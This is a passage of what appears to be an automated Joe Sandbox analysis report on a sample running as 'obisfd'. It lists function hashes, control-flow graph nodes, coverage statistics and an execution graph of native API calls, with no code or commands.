                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fd6c86a599cec8f7a8e9f7fc2468f9b2350a48533f717aff9f885899f301a96e
                                                                                            • Instruction ID: 81a5c9c814b6e5a3ee828a347348eb9aee8a522a162545e30c4614686521fe30
                                                                                            • Opcode Fuzzy Hash: fd6c86a599cec8f7a8e9f7fc2468f9b2350a48533f717aff9f885899f301a96e
                                                                                            • Instruction Fuzzy Hash: 89E13874E102598FDB14DFA8C580AAEFBF2BF89305F248669D815AB356D730AD41CF60
                                                                                            Function 002CC320 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e717547d10a7906dc8b72d8dfd286ff317d8277d340fc0af29ac75925523d6a1
                                                                                            • Instruction ID: 973090e95dd0b6fdd42653c741d7ce5eb9ebc944150e2db697f19bfde2648d06
                                                                                            • Opcode Fuzzy Hash: e717547d10a7906dc8b72d8dfd286ff317d8277d340fc0af29ac75925523d6a1
                                                                                            • Instruction Fuzzy Hash: 5EE11974E102598FDB14DFA8C580AADFBF6FF89301F248269D819AB355D730A941CF60
                                                                                            Function 002CD718 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 12af6f1b2b192c933b51f7b8185bbb151261a696b7720afb7a9fbb354e4fe9a9
                                                                                            • Instruction ID: 8644ecf304800057f5132dbca165e5f6fe36ea916370ebaf989eb541a2e137f4
                                                                                            • Opcode Fuzzy Hash: 12af6f1b2b192c933b51f7b8185bbb151261a696b7720afb7a9fbb354e4fe9a9
                                                                                            • Instruction Fuzzy Hash: 60E11A74E102598FDB14DFA8C580AAEFBF2BF88305F248269D815AB356D730AD41CF60
                                                                                            Function 002CC758 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 81b0a651c4a42697d14054c4d21aebc83a2143252a88f41a7a5b4b77f40c956a
                                                                                            • Instruction ID: 5c3e2081af801e2bb7421250ca66671588b2617325c2ef364d2d2d611626a5b4
                                                                                            • Opcode Fuzzy Hash: 81b0a651c4a42697d14054c4d21aebc83a2143252a88f41a7a5b4b77f40c956a
                                                                                            • Instruction Fuzzy Hash: 3BE10B74E102598FDB14DFA9C580AAEFBF2BF89305F248269D819A7356D730AD41CF60
                                                                                            Function 002CD709 Relevance: .1, Instructions: 133COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0510d21072a50a8130626b68d4fdfabffd9e31c374b44ce1ba405ba54c739028
                                                                                            • Instruction ID: 146dc5ce0133af08c1d7b96c058a5ef9584ca2570f89f1cf9cf779ea8dfac4e2
                                                                                            • Opcode Fuzzy Hash: 0510d21072a50a8130626b68d4fdfabffd9e31c374b44ce1ba405ba54c739028
                                                                                            • Instruction Fuzzy Hash: 81512E70E102598FDB14CFA9C940AAEFBF2BF89305F24C66AD408A7356D7309942CF60
                                                                                            Function 002CBEE8 Relevance: .1, Instructions: 127COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d682725a2362451c07c38c17c10551b6a6ca008872ac95b9111ab36ddf802604
                                                                                            • Instruction ID: 485c1a6b964fb315c8fc38e44cc9252bec0e22c13b8d1646db50cd878887c418
                                                                                            • Opcode Fuzzy Hash: d682725a2362451c07c38c17c10551b6a6ca008872ac95b9111ab36ddf802604
                                                                                            • Instruction Fuzzy Hash: CB511A70E102598FDB18DFA9C980AAEFBF6BF89305F24C169D418A7355D7319941CFA0

                                                                                            Execution Graph

                                                                                            Execution Coverage:6.4%
                                                                                            Dynamic/Decrypted Code Coverage:86%
                                                                                            Signature Coverage:22.1%
                                                                                            Total number of Nodes:86
                                                                                            Total number of Limit Nodes:3
                                                                                            execution_graph 30793 305390 30794 30539c 30793->30794 30809 308ec2 30794->30809 30796 30549d 30829 30e8a8 30796->30829 30798 305664 30839 693e68 30798->30839 30799 305775 30845 4e9312 30799->30845 30851 4e9320 30799->30851 30800 305aa8 30811 308ec7 30809->30811 30810 30543b 30821 6b68e8 30810->30821 30825 6b68e2 30810->30825 30811->30810 30857 30dd50 30811->30857 30861 30dd41 30811->30861 30865 30e133 30811->30865 30812 309043 KiUserExceptionDispatcher 30813 308fbe 30812->30813 30813->30810 30813->30812 30869 6b2ad8 30813->30869 30873 6b2c73 30813->30873 30877 6b2cef 30813->30877 30881 6b2ac9 30813->30881 30824 6b690a 30821->30824 30822 6b6ce9 30822->30796 30823 6b2ad8 LdrInitializeThunk 30823->30824 30824->30822 30824->30823 30828 6b68e8 30825->30828 30826 6b6ce9 30826->30796 30827 6b2ad8 LdrInitializeThunk 30827->30828 30828->30826 30828->30827 30830 30e8da 30829->30830 30831 30dd50 LdrInitializeThunk 30830->30831 30832 30557d 30830->30832 30831->30832 30833 4f82b0 30832->30833 30834 4f82d2 30833->30834 30835 4f83a5 30834->30835 30836 30dd50 LdrInitializeThunk 30834->30836 30837 30dd41 LdrInitializeThunk 30834->30837 30838 30e133 LdrInitializeThunk 30834->30838 30835->30798 30836->30835 30837->30835 30838->30835 30840 693e84 30839->30840 30841 693f2f 30840->30841 30842 30dd50 LdrInitializeThunk 30840->30842 30843 30dd41 LdrInitializeThunk 30840->30843 30844 30e133 LdrInitializeThunk 30840->30844 30841->30799 30842->30841 30843->30841 30844->30841 30846 4e9320 30845->30846 30847 4e93e7 30846->30847 30848 30dd50 LdrInitializeThunk 30846->30848 30849 30dd41 LdrInitializeThunk 30846->30849 30850 30e133 LdrInitializeThunk 30846->30850 30847->30800 30848->30847 30849->30847 30850->30847 30852 4e933c 30851->30852 30853 4e93e7 30852->30853 30854 30dd50 LdrInitializeThunk 30852->30854 30855 30dd41 LdrInitializeThunk 30852->30855 30856 30e133 LdrInitializeThunk 30852->30856 30853->30800 30854->30853 30855->30853 30856->30853 30860 30dd81 30857->30860 30858 30dee1 30858->30813 30859 30e270 LdrInitializeThunk 30859->30858 30860->30858 30860->30859 30863 30dd48 30861->30863 30862 30dee1 30862->30813 30863->30862 30864 30e270 LdrInitializeThunk 30863->30864 30864->30862 30867 30dfeb LdrInitializeThunk 30865->30867 30868 30e288 30867->30868 30868->30813 30870 6b2aff 30869->30870 30871 6b2c2a LdrInitializeThunk 30870->30871 30872 6b2c1b 30870->30872 30871->30872 30872->30813 30875 6b2b37 30873->30875 30874 6b2c2a LdrInitializeThunk 30876 6b2c1b 30874->30876 30875->30874 30875->30876 30876->30813 30879 6b2c1b 30877->30879 30880 6b2b37 30877->30880 30878 6b2c2a LdrInitializeThunk 30878->30879 30879->30813 30880->30878 30880->30879 30882 6b2aff 30881->30882 30883 6b2c1b 30882->30883 30884 6b2c2a LdrInitializeThunk 30882->30884 30883->30813 30884->30883 30885 300848 30886 30086a 30885->30886 30888 300c10 30886->30888 30889 302320 30886->30889 30892 305735 30889->30892 30891 302325 30891->30888 30893 305744 30892->30893 30898 693e68 3 API calls 30893->30898 30894 305775 30896 4e9312 3 API calls 30894->30896 30897 4e9320 3 API calls 30894->30897 30895 305aa8 30895->30891 30896->30895 30897->30895 30898->30894

                                                                                            Executed Functions

                                                                                            Function 00309A4A Relevance: 4.3, Strings: 1, Instructions: 3074COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923412481.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_300000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: N
                                                                                            • API String ID: 0-1130791706
                                                                                            • Opcode ID: 32a2d0e97edff8bef7f5d7ad87245ebd6cd47302549284951b86bf3803c8a05a
                                                                                            • Instruction ID: 043db3f93eb5ee935788bf7dc1eca3c8d99fe0903e143a68fbffb8dde236ae0c
                                                                                            • Opcode Fuzzy Hash: 32a2d0e97edff8bef7f5d7ad87245ebd6cd47302549284951b86bf3803c8a05a
                                                                                            • Instruction Fuzzy Hash: FD73E131C10B5A8EDB11EF68C894A9DF7B1FF95300F51869AE44977261EB70AAC4CF81
                                                                                            Function 0030DD50 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 954 30dd50-30dd7f 955 30dd81 954->955 956 30dd86-30de1c 954->956 955->956 958 30debb-30dec1 956->958 959 30de21-30de34 958->959 960 30dec7-30dedf 958->960 961 30de36 959->961 962 30de3b-30de45 959->962 963 30dee1-30deee 960->963 964 30def3-30df06 960->964 961->962 968 30de4c-30de8c 962->968 965 30e288-30e384 963->965 966 30df08 964->966 967 30df0d-30df29 964->967 972 30e386-30e38b 965->972 973 30e38c-30e396 965->973 966->967 969 30df30-30df54 967->969 970 30df2b 967->970 980 30de8e-30de9c 968->980 981 30de9f-30deb1 968->981 976 30df56 969->976 977 30df5b-30df8d 969->977 970->969 972->973 976->977 986 30df94-30dfd6 977->986 987 30df8f 977->987 980->960 983 30deb3 981->983 984 30deb8 981->984 983->984 984->958 989 30dfd8 986->989 990 30dfdd-30dfe6 986->990 987->986 989->990 991 30e20d-30e213 990->991 992 30e219-30e22c 991->992 993 30dfeb-30e010 991->993 996 30e233-30e24e 992->996 997 30e22e 992->997 994 30e012 993->994 995 30e017-30e04d 993->995 994->995 1005 30e054-30e086 995->1005 1006 30e04f 995->1006 998 30e250 996->998 999 30e255-30e269 996->999 997->996 998->999 1002 30e270-30e286 LdrInitializeThunk 999->1002 1003 30e26b 999->1003 1002->965 1003->1002 1008 30e088-30e0ad 1005->1008 1009 30e0ea-30e0fd 1005->1009 1006->1005 1010 30e0b4-30e0e2 1008->1010 1011 30e0af 1008->1011 1012 30e104-30e129 1009->1012 1013 30e0ff 1009->1013 1010->1009 1011->1010 1016 30e138-30e170 1012->1016 1017 30e12b-30e12c 1012->1017 1013->1012 1018 30e172 1016->1018 1019 30e177-30e1d8 1016->1019 1017->992 1018->1019 1024 30e1da 1019->1024 1025 30e1df-30e203 1019->1025 1024->1025 1028 30e205 1025->1028 1029 30e20a 1025->1029 1028->1029 1029->991
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923412481.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_300000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d27e1cc6e2e630b3b13b49c8e1693a77ac5f261451462735590c0a9b4f04acd3
                                                                                            • Instruction ID: a71d2c511762facd7d6294cf39cd436e45c6dbddcfe42f0d2379c2ebbdbd6b93
                                                                                            • Opcode Fuzzy Hash: d27e1cc6e2e630b3b13b49c8e1693a77ac5f261451462735590c0a9b4f04acd3
                                                                                            • Instruction Fuzzy Hash: E4F1F674E11218CFDB14DFA9C984B9DFBB2BF88304F5485A9D808AB395DB70A985CF50
                                                                                            Function 003069B8 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1030 3069b8-3069d8 1031 3069da 1030->1031 1032 3069df-306bcb call 300374 * 4 1030->1032 1031->1032 1053 307429-30743f 1032->1053 1054 306bd0-306bd9 1053->1054 1055 307445-307483 1053->1055 1056 306be0-306bfe 1054->1056 1057 306bdb 1054->1057 1058 306c04-306c26 call 3037e8 1056->1058 1059 30741c-307422 1056->1059 1057->1056 1065 3073ff-307415 1058->1065 1059->1053 1062 307424 1059->1062 1062->1053 1067 306c2b-306c34 1065->1067 1068 30741b 1065->1068 1069 306c36 1067->1069 1070 306c3b-306d5a call 300374 call 300394 * 5 1067->1070 1068->1059 1069->1070 1084 306d5f-306d8c 1070->1084 1085 3073c2-3073e1 1084->1085 1086 306d92-306d9e 1084->1086 1089 3073f0-3073f1 1085->1089 1090 3073e3-3073ef 1085->1090 1088 306e3e-306e54 1086->1088 1091 306da3-306dac 1088->1091 1092 306e5a-306f20 call 300394 1088->1092 1089->1065 1090->1089 1093 306db3-306de4 call 300394 1091->1093 1094 306dae 1091->1094 1113 306f22 1092->1113 1114 306f27-306f82 1092->1114 1101 306de6-306e27 call 300394 1093->1101 1102 306e28-306e34 1093->1102 1094->1093 1101->1102 1105 306e36 1102->1105 1106 306e3b 1102->1106 1105->1106 1106->1088 1113->1114 1116 306f84 1114->1116 1117 306f89-306f8d 1114->1117 1116->1117 1118 306f9d-306fa7 1117->1118 1119 306f8f-306f9b 1117->1119 1120 306fa9 1118->1120 1121 306fae-306fce 1118->1121 1122 306fd4-307066 call 300394 1119->1122 1120->1121 1121->1122 1129 307202-307229 1122->1129 1130 30706c-3070fc 1122->1130 1133 30722a-3073c1 1129->1133 1137 307103-30715e 1130->1137 1138 3070fe 1130->1138 1133->1085 1142 307160 1137->1142 1143 307165-307169 1137->1143 1138->1137 1142->1143 1145 307179-307183 1143->1145 1146 30716b-307177 1143->1146 1148 307185 1145->1148 1149 30718a-3071aa 1145->1149 1147 3071b0-307200 1146->1147 1147->1133 1148->1149 1149->1147
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923412481.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_300000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: &55p
                                                                                            • API String ID: 0-1955183375
                                                                                            • Opcode ID: 8893ae24283c54fa899848fad8b61f75bd4e4c6b3d51284d3a3bab25fe4a5574
                                                                                            • Instruction ID: a61c51fa9e9e414d88d16ee66bba4e591304b7030ec61cd8e57cfc9ea34e80cf
                                                                                            • Opcode Fuzzy Hash: 8893ae24283c54fa899848fad8b61f75bd4e4c6b3d51284d3a3bab25fe4a5574
                                                                                            • Instruction Fuzzy Hash: B9529D74E01228CFDB65DF65C894B9DBBB2BB89300F1085EAD409AB355DB35AE81CF50
                                                                                            Function 00308EC2 Relevance: 1.8, APIs: 1, Instructions: 276COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1166 308ec2-308ec5 1167 308ec7-308ef0 1166->1167 1168 308efb-308f88 1166->1168 1169 308ef2 1167->1169 1170 308ef7-308ef9 1167->1170 1174 3092da-30930c 1168->1174 1175 308f8e-308f9e 1168->1175 1169->1170 1170->1168 1227 308fa1 call 309330 1175->1227 1228 308fa1 call 309672 1175->1228 1178 308fa7-308fb6 1229 308fb8 call 30dd50 1178->1229 1230 308fb8 call 30dd41 1178->1230 1231 308fb8 call 30e133 1178->1231 1179 308fbe-308fda 1181 308fe1-308fea 1179->1181 1182 308fdc 1179->1182 1183 3092cd-3092d3 1181->1183 1182->1181 1184 3092d9 1183->1184 1185 308fef-308ffb 1183->1185 1184->1174 1223 308ffd call 6b2ac9 1185->1223 1224 308ffd call 6b2ad8 1185->1224 1225 308ffd call 6b2cef 1185->1225 1226 308ffd call 6b2c73 1185->1226 1186 309003-309069 KiUserExceptionDispatcher 1189 309125-309180 1186->1189 1190 30906f-3090dd call 303858 1186->1190 1200 309181-3091cf 1189->1200 1201 309120-309123 1190->1201 1202 3090df-30911f 1190->1202 1207 3091d5-3092b7 1200->1207 1208 3092b8-3092c3 1200->1208 1201->1200 1202->1201 1207->1208 1210 3092c5 1208->1210 1211 3092ca 1208->1211 1210->1211 1211->1183 1223->1186 1224->1186 1225->1186 1226->1186 1227->1178 1228->1178 1229->1179 1230->1179 1231->1179
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00309055
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923412481.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_300000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: ea48017ef4689cf8f5bc2a9e278b0c2bc7071ddacf74b60cb884d63410b2a482
                                                                                            • Instruction ID: e2765ac9d569589bc669f7dc81c0236b320205583af587cc1e52ec2ed3363c6e
                                                                                            • Opcode Fuzzy Hash: ea48017ef4689cf8f5bc2a9e278b0c2bc7071ddacf74b60cb884d63410b2a482
                                                                                            • Instruction Fuzzy Hash: DED1C174E01218CFDB54DFA5D994B9DBBB2BF89300F1084AAD809AB395DB355E85CF10
                                                                                            Function 006E0040 Relevance: .7, Instructions: 745COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1789 6e0040-6e0060 1790 6e0067-6e00df 1789->1790 1791 6e0062 1789->1791 1795 6e012c-6e017e 1790->1795 1796 6e00e1-6e0127 1790->1796 1791->1790 1803 6e01c5-6e02a9 1795->1803 1804 6e0180-6e01c4 1795->1804 1796->1803 1816 6e0e5e-6e0e93 1803->1816 1817 6e02af-6e03b1 1803->1817 1804->1803 1827 6e0e51-6e0e57 1817->1827 1828 6e0e5d 1827->1828 1829 6e03b6-6e0493 1827->1829 1828->1816 1837 6e049a-6e0502 1829->1837 1838 6e0495 1829->1838 1842 6e0509-6e051a 1837->1842 1843 6e0504 1837->1843 1838->1837 1844 6e05a6-6e06ac 1842->1844 1845 6e0520-6e052a 1842->1845 1843->1842 1863 6e06ae 1844->1863 1864 6e06b3-6e071b 1844->1864 1846 6e052c 1845->1846 1847 6e0531-6e05a5 1845->1847 1846->1847 1847->1844 1863->1864 1868 6e071d 1864->1868 1869 6e0722-6e0733 1864->1869 1868->1869 1870 6e07bf-6e0972 1869->1870 1871 6e0739-6e0743 1869->1871 1892 6e0979-6e09f6 1870->1892 1893 6e0974 1870->1893 1872 6e074a-6e07be 1871->1872 1873 6e0745 1871->1873 1872->1870 1873->1872 1897 6e09fd-6e0a0e 1892->1897 1898 6e09f8 1892->1898 1893->1892 1899 6e0a9a-6e0b33 1897->1899 1900 6e0a14-6e0a1e 1897->1900 1898->1897 1910 6e0b3a-6e0bb1 1899->1910 1911 6e0b35 1899->1911 1901 6e0a25-6e0a99 1900->1901 1902 6e0a20 1900->1902 1901->1899 1902->1901 1918 6e0bb8-6e0bc9 1910->1918 1919 6e0bb3 1910->1919 1911->1910 1920 6e0bcf-6e0c63 1918->1920 1921 6e0cb6-6e0d4a 1918->1921 1919->1918 1936 6e0c6a-6e0cb5 1920->1936 1937 6e0c65 1920->1937 1930 6e0e3c-6e0e47 1921->1930 1931 6e0d50-6e0e3b 1921->1931 1932 6e0e4e 1930->1932 1933 6e0e49 1930->1933 1931->1930 1932->1827 1933->1932 1936->1921 1937->1936
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c6aa3fa5070395fd723e79c1ba696dc376f82acf241f5cf027219ba05e1949cc
                                                                                            • Instruction ID: 74099abc6ef9b85be4005f23bbb471b33c18d4253bc78e49d2500948b9a91126
                                                                                            • Opcode Fuzzy Hash: c6aa3fa5070395fd723e79c1ba696dc376f82acf241f5cf027219ba05e1949cc
                                                                                            • Instruction Fuzzy Hash: C0827D74E012688FEB64DF69C994BDEBBB2AB89300F1481EAD50DA7355DB315E81CF40
                                                                                            Function 00307490 Relevance: .7, Instructions: 717COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1951 307490-3074c0 1952 3074c2 1951->1952 1953 3074c7-307549 1951->1953 1952->1953 1955 3075ae-3075c4 1953->1955 1956 3075c6-307610 call 300374 1955->1956 1957 30754b-307554 1955->1957 1966 307612-307653 call 300394 1956->1966 1967 30767b-30767c 1956->1967 1958 307556 1957->1958 1959 30755b-3075a4 call 3060bc 1957->1959 1958->1959 1968 3075a6 1959->1968 1969 3075ab 1959->1969 1976 307675-307676 1966->1976 1977 307655-307673 1966->1977 1971 30767d-3076ae 1967->1971 1968->1969 1969->1955 1975 3076b5-30771c 1971->1975 1983 307722-307743 1975->1983 1984 30806e-3080a3 1975->1984 1978 307677-307679 1976->1978 1977->1978 1978->1971 1987 30804b-308067 1983->1987 1988 307748-307751 1987->1988 1989 30806d 1987->1989 1990 307753 1988->1990 1991 307758-3077be call 303810 1988->1991 1989->1984 1990->1991 1996 3077c0 1991->1996 1997 3077c5-30784f call 303820 1991->1997 1996->1997 2004 307861-307868 1997->2004 2005 307851-307858 1997->2005 2008 30786a 2004->2008 2009 30786f-30787c 2004->2009 2006 30785a 2005->2006 2007 30785f 2005->2007 2006->2007 2007->2009 2008->2009 2010 307883-30788a 2009->2010 2011 30787e 2009->2011 2012 307891-3078e8 2010->2012 2013 30788c 2010->2013 2011->2010 2016 3078ea 2012->2016 2017 3078ef-307906 2012->2017 2013->2012 2016->2017 2018 307911-307919 2017->2018 2019 307908-30790f 2017->2019 2020 30791a-307924 2018->2020 2019->2020 2021 307926 2020->2021 2022 30792b-307934 2020->2022 2021->2022 2023 30801b-308021 2022->2023 2024 308027-308041 2023->2024 2025 307939-307945 2023->2025 2033 308043 2024->2033 2034 308048 2024->2034 2026 307947 2025->2026 2027 30794c-307951 2025->2027 2026->2027 2028 307953-30795f 2027->2028 2029 307994-307996 2027->2029 2031 307961 2028->2031 2032 307966-30796b 2028->2032 2035 30799c-3079b0 2029->2035 2031->2032 2032->2029 2036 30796d-30797a 2032->2036 2033->2034 2034->1987 2037 3079b6-3079cb 2035->2037 2038 307ff9-308006 2035->2038 2039 307981-307992 2036->2039 2040 30797c 2036->2040 2041 3079d2-307a58 2037->2041 2042 3079cd 2037->2042 2043 308007-308011 2038->2043 2039->2035 2040->2039 2050 307a82 2041->2050 2051 307a5a-307a80 2041->2051 2042->2041 2044 308013 2043->2044 2045 308018 2043->2045 2044->2045 2045->2023 2052 307a8c-307aac 2050->2052 2051->2052 2054 307ab2-307abc 2052->2054 2055 307c2b-307c30 2052->2055 2056 307ac3-307aec 2054->2056 2057 307abe 2054->2057 2058 307c32-307c52 2055->2058 2059 307c94-307c96 2055->2059 2061 307b06-307b08 2056->2061 2062 307aee-307af8 2056->2062 2057->2056 2069 307c54-307c7a 2058->2069 2070 307c7c 2058->2070 2060 307c9c-307cbc 2059->2060 2066 307cc2-307ccc 2060->2066 2067 307ff3-307ff4 2060->2067 2065 307ba7-307bb6 2061->2065 2063 307afa 2062->2063 2064 307aff-307b05 2062->2064 2063->2064 2064->2061 2071 307bb8 2065->2071 2072 307bbd-307bc2 2065->2072 2073 307cd3-307cfc 2066->2073 2074 307cce 2066->2074 2075 307ff5-307ff7 2067->2075 2076 307c86-307c92 2069->2076 2070->2076 2071->2072 2077 307bc4-307bd4 2072->2077 2078 307bec-307bee 2072->2078 2079 307d16-307d24 2073->2079 2080 307cfe-307d08 2073->2080 2074->2073 2075->2043 2076->2060 2083 307bd6 2077->2083 2084 307bdb-307bea 2077->2084 2085 307bf4-307c08 2078->2085 2081 307dc3-307dd2 2079->2081 2086 307d0a 2080->2086 2087 307d0f-307d15 2080->2087 2090 307dd4 2081->2090 2091 307dd9-307dde 2081->2091 2083->2084 2084->2085 2088 307b0d-307b28 2085->2088 2089 307c0e-307c26 2085->2089 2086->2087 2087->2079 2094 307b2a 2088->2094 2095 307b2f-307b99 2088->2095 2089->2075 2090->2091 2092 307de0-307df0 2091->2092 2093 307e08-307e0a 2091->2093 2096 307df2 2092->2096 2097 307df7-307e06 2092->2097 2098 307e10-307e24 2093->2098 2094->2095 2112 307ba0-307ba6 2095->2112 2113 307b9b 2095->2113 2096->2097 2097->2098 2099 307d29-307d44 2098->2099 2100 307e2a-307e93 2098->2100 2102 307d46 2099->2102 2103 307d4b-307db5 2099->2103 2110 307e95-307e97 2100->2110 2111 307e9c-307fef 2100->2111 2102->2103 2117 307db7 2103->2117 2118 307dbc-307dc2 2103->2118 2114 307ff0-307ff1 2110->2114 2111->2114 2112->2065 2113->2112 2114->2024 2117->2118 2118->2081
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923412481.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_300000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 101ce2463900886d7c8ad68863cff8e8650910ef624a1e45fa7250662a843139
                                                                                            • Instruction ID: 5e1474f2e1fc43df78aaf9c3d13c94f70c4906c8b42e1d1c15509a8ff8c6a1d5
                                                                                            • Opcode Fuzzy Hash: 101ce2463900886d7c8ad68863cff8e8650910ef624a1e45fa7250662a843139
                                                                                            • Instruction Fuzzy Hash: 7C72F274E062288FDB65DF65C994BDDBBB2BB89300F1085E9D409A7391DB34AE81CF50
                                                                                            Function 004F95D0 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 3009 4f95d0-4f95f0 3010 4f95f7-4f964d 3009->3010 3011 4f95f2 3009->3011 3012 4f9657-4f9688 3010->3012 3011->3010 3015 4f968e-4f96e0 3012->3015 3016 4f9a48-4f9a7a 3012->3016 3022 4f96e7-4f96f0 3015->3022 3023 4f96e2 3015->3023 3024 4f9a3b-4f9a41 3022->3024 3023->3022 3025 4f9a47 3024->3025 3026 4f96f5-4f97b3 3024->3026 3025->3016 3033 4f986f-4f98c9 3026->3033 3034 4f97b9-4f9827 3026->3034 3043 4f98ca-4f993d 3033->3043 3044 4f986a-4f986d 3034->3044 3045 4f9829-4f9869 3034->3045 3052 4f9a26-4f9a31 3043->3052 3053 4f9943-4f9a25 3043->3053 3044->3043 3045->3044 3054 4f9a38 3052->3054 3055 4f9a33 3052->3055 3053->3052 3054->3024 3055->3054
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6a8bc8d93c690937332b7eac1279f3e15f4ce43a8489b376e20f1adaf9e7da16
                                                                                            • Instruction ID: a8167059cf0bbed064b38fa212a3010c3f1c26e123e246b6b6299b852181d0f0
                                                                                            • Opcode Fuzzy Hash: 6a8bc8d93c690937332b7eac1279f3e15f4ce43a8489b376e20f1adaf9e7da16
                                                                                            • Instruction Fuzzy Hash: 0FD1B074E002188FDB54DFA5C895BADBBB2FF89300F5081AAD409AB395DB359E81CF54
                                                                                            Function 004F82B0 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
